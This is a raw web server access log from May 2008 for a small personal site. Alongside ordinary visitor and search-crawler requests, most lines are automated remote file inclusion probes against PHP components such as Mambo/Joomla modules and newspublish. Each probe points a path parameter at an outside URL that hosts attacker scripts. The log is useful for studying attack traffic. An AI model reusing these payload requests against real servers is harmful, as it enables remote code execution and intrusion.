216.70.125.187 - - [29/May/2008:13:36:13 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
64.13.224.83 - - [29/May/2008:13:36:53 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
64.13.224.83 - - [29/May/2008:13:36:53 -0500] "GET //config/dbutil.bck.php?confdir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
201.6.121.78 - - [29/May/2008:13:38:17 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
62.128.131.80 - - [29/May/2008:13:38:49 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
62.128.131.80 - - [29/May/2008:13:38:49 -0500] "GET //config/dbutil.bck.php?confdir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
66.163.197.88 - - [29/May/2008:13:39:09 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.163.197.88 - - [29/May/2008:13:39:09 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.232.156.135 - - [29/May/2008:13:42:26 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
66.232.156.135 - - [29/May/2008:13:42:26 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
74.52.139.226 - - [29/May/2008:13:43:12 -0500] "GET /logs/index.php?_REQUEST=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
74.52.139.226 - - [29/May/2008:13:43:12 -0500] "GET /index.php?_REQUEST=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
200.135.11.22 - - [29/May/2008:13:44:08 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 287 "-""libwww-perl/5.803"
200.135.11.22 - - [29/May/2008:13:44:09 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.803"
213.198.106.61 - - [29/May/2008:13:46:06 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
213.198.106.61 - - [29/May/2008:13:46:07 -0500] "GET //skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
62.112.193.46 - - [29/May/2008:13:46:21 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
62.112.193.46 - - [29/May/2008:13:46:21 -0500] "GET /newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
74.8.73.90 - - [29/May/2008:13:46:27 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
74.8.73.90 - - [29/May/2008:13:46:27 -0500] "GET //skin/zero_vote/error.php?dir=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
65.55.208.121 - - [29/May/2008:13:46:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [29/May/2008:13:46:45 -0500] "GET /artwork/menorahs.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
200.59.145.196 - - [29/May/2008:13:47:11 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.59.145.196 - - [29/May/2008:13:47:11 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
76.89.243.16 - - [29/May/2008:13:47:42 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_designer""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:47:43 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:47:53 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:47:54 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:47:54 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:47:54 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:47:58 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:00 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:00 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:01 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:01 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:01 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:01 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:01 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:02 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:02 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:02 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:03 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:04 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:04 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:09 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3346 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:09 -0500] "GET /costume/costm13.jpg HTTP/1.1" 200 10011 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:09 -0500] "GET /costume/costm14.jpg HTTP/1.1" 200 10586 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:10 -0500] "GET /costume/costm15.jpg HTTP/1.1" 200 9724 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:10 -0500] "GET /costume/costm16.jpg HTTP/1.1" 200 9075 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:10 -0500] "GET /costume/costm17.jpg HTTP/1.1" 200 9825 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:10 -0500] "GET /costume/costm18.jpg HTTP/1.1" 200 9364 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:10 -0500] "GET /costume/costm19.jpg HTTP/1.1" 200 10555 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:10 -0500] "GET /costume/costm21.jpg HTTP/1.1" 200 9439 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:10 -0500] "GET /costume/costm20.jpg HTTP/1.1" 200 57110 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:10 -0500] "GET /costume/costm22.jpg HTTP/1.1" 200 9434 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:10 -0500] "GET /costume/costm23.jpg HTTP/1.1" 200 9858 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:10 -0500] "GET /costume/costm24.jpg HTTP/1.1" 200 9990 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:15 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 2922 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:15 -0500] "GET /costume/costm25.jpg HTTP/1.1" 200 9810 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:15 -0500] "GET /costume/costm26.jpg HTTP/1.1" 200 9402 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:15 -0500] "GET /costume/costm28.jpg HTTP/1.1" 200 10658 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:15 -0500] "GET /costume/costm27.jpg HTTP/1.1" 200 9516 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:15 -0500] "GET /costume/costm29.jpg HTTP/1.1" 200 9835 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:15 -0500] "GET /costume/costm31.jpg HTTP/1.1" 200 9395 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:15 -0500] "GET /costume/costm30.jpg HTTP/1.1" 200 59433 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:15 -0500] "GET /costume/costm32.jpg HTTP/1.1" 200 9839 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:16 -0500] "GET /costume/costm33.jpg HTTP/1.1" 200 9703 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:16 -0500] "GET /costume/costm34.jpg HTTP/1.1" 200 9637 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:16 -0500] "GET /costume/costm35.jpg HTTP/1.1" 200 10912 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.89.243.16 - - [29/May/2008:13:48:16 -0500] "GET /costume/costm36.jpg HTTP/1.1" 200 9631 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
216.167.156.20 - - [29/May/2008:13:48:34 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
216.167.156.20 - - [29/May/2008:13:48:34 -0500] "GET //skin/zero_vote/error.php?dir=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
74.6.21.100 - - [29/May/2008:13:50:30 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.45 - - [29/May/2008:13:50:30 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.160.203.190 - - [29/May/2008:13:52:24 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
217.160.203.190 - - [29/May/2008:13:52:24 -0500] "GET //skin/zero_vote/error.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
213.246.42.59 - - [29/May/2008:13:52:34 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
213.246.42.59 - - [29/May/2008:13:52:34 -0500] "GET /newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
213.240.250.130 - - [29/May/2008:13:53:52 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
213.240.250.130 - - [29/May/2008:13:53:53 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
213.240.250.130 - - [29/May/2008:13:53:53 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
213.240.250.130 - - [29/May/2008:13:53:53 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
193.164.131.35 - - [29/May/2008:13:59:45 -0500] "GET /errors.php?error=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
193.164.131.35 - - [29/May/2008:13:59:45 -0500] "GET /logs/access_log.1205625600/errors.php?error=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
193.164.131.35 - - [29/May/2008:13:59:46 -0500] "GET /logs/errors.php?error=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
70.84.106.68 - - [29/May/2008:14:07:35 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
70.84.106.68 - - [29/May/2008:14:07:35 -0500] "GET /newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
79.25.107.34 - - [29/May/2008:14:10:15 -0500] "GET /logs/Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 335 "-""libwww-perl/5.812"
79.25.107.34 - - [29/May/2008:14:10:16 -0500] "GET /Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 330 "-""libwww-perl/5.812"
85.214.28.24 - - [29/May/2008:14:13:38 -0500] "GET //errors.php?error=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 295 "-""Avant Browser (http://www.avantbrowser.com)"
85.214.28.24 - - [29/May/2008:14:13:38 -0500] "GET /logs//errors.php?error=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 300 "-""Avant Browser (http://www.avantbrowser.com)"
218.150.78.76 - - [29/May/2008:14:18:13 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
218.150.78.76 - - [29/May/2008:14:18:28 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
66.160.45.206 - - [29/May/2008:14:21:02 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_designer""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
66.160.45.206 - - [29/May/2008:14:21:02 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
66.160.45.206 - - [29/May/2008:14:21:08 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
66.160.45.206 - - [29/May/2008:14:21:08 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
66.160.45.206 - - [29/May/2008:14:21:08 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
66.160.45.206 - - [29/May/2008:14:21:08 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.198.106.61 - - [29/May/2008:14:24:24 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
213.198.106.61 - - [29/May/2008:14:24:25 -0500] "GET //skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
213.198.106.61 - - [29/May/2008:14:24:25 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
213.198.106.61 - - [29/May/2008:14:24:25 -0500] "GET /logs/access_log.1207180800//skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
64.38.4.3 - - [29/May/2008:14:24:31 -0500] "GET /logs//errors.php?error=http://g4br13l.iespana.es/idsforscan/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
64.38.4.3 - - [29/May/2008:14:24:31 -0500] "GET //errors.php?error=http://g4br13l.iespana.es/idsforscan/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
195.12.53.176 - - [29/May/2008:14:27:36 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
195.12.53.176 - - [29/May/2008:14:27:36 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
200.135.11.22 - - [29/May/2008:14:27:43 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 316 "-""libwww-perl/5.803"
200.135.11.22 - - [29/May/2008:14:27:43 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 311 "-""libwww-perl/5.803"
200.223.113.2 - - [29/May/2008:14:27:48 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
200.223.113.2 - - [29/May/2008:14:27:51 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
200.59.145.196 - - [29/May/2008:14:28:16 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
200.59.145.196 - - [29/May/2008:14:28:17 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
201.26.193.246 - - [29/May/2008:14:28:29 -0500] "GET /logs/access_log.1207785600=http://ninguem.t35.com/pbot.txt? HTTP/1.1" 404 342 "-""Mozilla/3.0 (compatible; Indy Library)"
195.209.236.71 - - [29/May/2008:14:28:34 -0500] "GET /logs/access_log.1207785600/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
195.209.236.71 - - [29/May/2008:14:28:34 -0500] "GET /newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
195.209.236.71 - - [29/May/2008:14:28:34 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
195.209.236.71 - - [29/May/2008:14:28:45 -0500] "GET /logs/access_log.1207180800/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
